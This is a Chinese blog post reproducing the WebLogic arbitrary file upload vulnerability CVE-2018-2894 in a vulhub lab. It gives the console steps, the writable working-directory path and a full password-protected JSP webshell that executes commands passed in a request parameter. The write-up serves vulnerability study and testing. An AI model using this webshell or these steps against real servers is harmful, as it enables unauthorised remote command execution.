weblogic任意文件上传漏洞复现(CVE-2018-2894)

weblogic任意文件上传漏洞复现(CVE-2018-2894)

漏洞限制

  1. 需要登录
  2. 需要写权限

环境搭建

本次漏洞为了更真实的模拟实际环境,使用vulhub在vps上搭建。
首先vps防火墙开启7001端口,这是环境启动后的端口
搭建vulhub靶场的教程网上很多,也可以参考官网
搭建完成后使用sudo docker-compose up -d启动weblogic任意文件上传漏洞环境。(这里使用了另一个漏洞环境的启动截图(^_^))。
在这里插入图片描述
使用sudo docker-compose logs | grep password查看登录账号和密码。
在这里插入图片描述

漏洞复现

访问http://your-ip:7001/console并使用刚才得到的账号密码登录
在这里插入图片描述
访问base_domain
在这里插入图片描述
高级->启用web测试页
在这里插入图片描述
访问测试页面/ws_utc
在这里插入图片描述
发现存在限制,直接访问config.do页面
在这里插入图片描述
设置工作目录为/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css
指定工作目录的目的是为了写文件,所以需要指定可写目录为工作目录。
在安全界面上传webshell。
这里使用有回显带密码验证的webshell。

<%
    if("023".equals(request.getParameter("pwd"))){
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
        int a = -1;
        byte[] b = new byte[2048];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b));
        }
        out.print("</pre>");
    }
%>

抓包得到时间戳。
在这里插入图片描述
拼接/ws_utc/css/config/keystore/[时间戳]_[文件名]并分别访问。
可写目录成功执行。
在这里插入图片描述
不可写目录虽然显示上传成功,但访问返回404。
在这里插入图片描述

使用工具

使用Upsploit工具进行上传测试。
抓包上传数据包
在这里插入图片描述
在这里插入图片描述
将上传数据包放入run test
在这里插入图片描述
在这里插入图片描述
上传成功,访问上传文件,成功弹窗。
在这里插入图片描述
还有其他上传方法,就不一一列举了,直接看结果。
在这里插入图片描述
可以看到上传的内容,为javascript语句。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值